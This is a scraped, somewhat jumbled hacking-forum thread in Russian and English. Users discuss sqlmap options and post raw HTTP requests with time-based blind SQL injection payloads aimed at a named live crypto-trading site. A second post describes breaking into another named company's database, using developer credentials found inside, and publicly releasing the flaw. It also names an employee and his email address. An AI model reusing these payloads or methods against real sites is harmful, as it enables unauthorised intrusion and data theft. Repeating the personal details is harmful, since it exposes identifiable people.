I put the orginal value , bur still not injectableAppend to the text document and then -r path/to/file. Don't forget to put original value.
I put the orginal value , bur still not injectableAppend to the text document and then -r path/to/file. Don't forget to put original value.
--dbms=postgresql --level=5 --risk=3Я поставил исходное значение, но все еще не инъекционный
POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 166
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive
&action=LOGIN&email=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&password=login_password
POST /ajax/trading_live HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 88
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive
action=CHECK_TRADING_CURRENCY_PRICE&pairs=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
Уже было, сайт скам если чтоКод:POST /ajax/function.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* X-Requested-With: XMLHttpRequest Referer: https://bitxola.com/ Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae Content-Length: 166 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Host: bitxola.com Connection: Keep-alive &action=LOGIN&email=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&password=login_password
Код:POST /ajax/trading_live HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://bitxola.com/ Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae Content-Length: 88 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Host: bitxola.com Connection: Keep-alive action=CHECK_TRADING_CURRENCY_PRICE&pairs=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
gives forbidden nowHidden content
Hidden content

У меня одного этот пост диссонанс вызывает?Всем Привет Форумчане!
В конце февраля 2023 была найдена SQL уязвимость сайта Gazgolder.com
После проверки и открытия базы данных сайта последовал звонок в компанию Gazgolder, а именно SMM Директору Дмитрийю Миловзорову mti@gazgolder.com
При разговоре с ним и предложении рассказать об уязвимости, меня попросили отписаться на почту.
Прошел месяц, но ответ так и не последовал. Через две недели, после разговора с Дмитрием Миловзоровым мы решили написать команде разработчиков сайта.
Разработкой сайта занималась команда "Creative team". Мы также обратились к ним, найдя в базе данные их учетные данные для входа при разработке сайта.
За ними последовал ответ, что администрированием сайта они больше не занимаются. Но если понадобиться помощь в устранении уязвимости, они с радостью помогут.
Так как мы до сих пор не получили ответ, нам пришлось позвонить по всем номерам указанных в контактах сайта. Но к сожалению все менеджеры артистов отправляли нас к Дмитрийю Миловзорову.
И что самое удивительное, при повторном звонке Дмитрию, он так же попросил нас отписать на свою почту.
Прошел уже месяц!!! Спустя это время, при повторной проверки уязвимости, ошибка НЕ БЫЛА ИСПРАВЛЕНА.
К Великому сожалению я выкладываю SQL уязвимость в открытый доступ. А именно на сайтhttps://xss.proОгромное Спасибо (CheckerChin, etc/passwd, c0d3x, NecroMortis, k4rk4j0i)
![]()
Так а что с ней делать?У меня одного этот пост диссонанс вызывает?
1) Найти уязвимость;
2) Скомпрометировать данные бд;
3) Позвонить SMM директору и рассказать о том что нашли;
4) Позвонить еще раз и опять рассказать;
5) Выложить в паблик.
Это возможно была бы смешная история «троллинга» (хотя не понятно кто кого «затроллил» то в итоге), если бы не .ru корни у таргета
Прошу прощения за оффтоп
.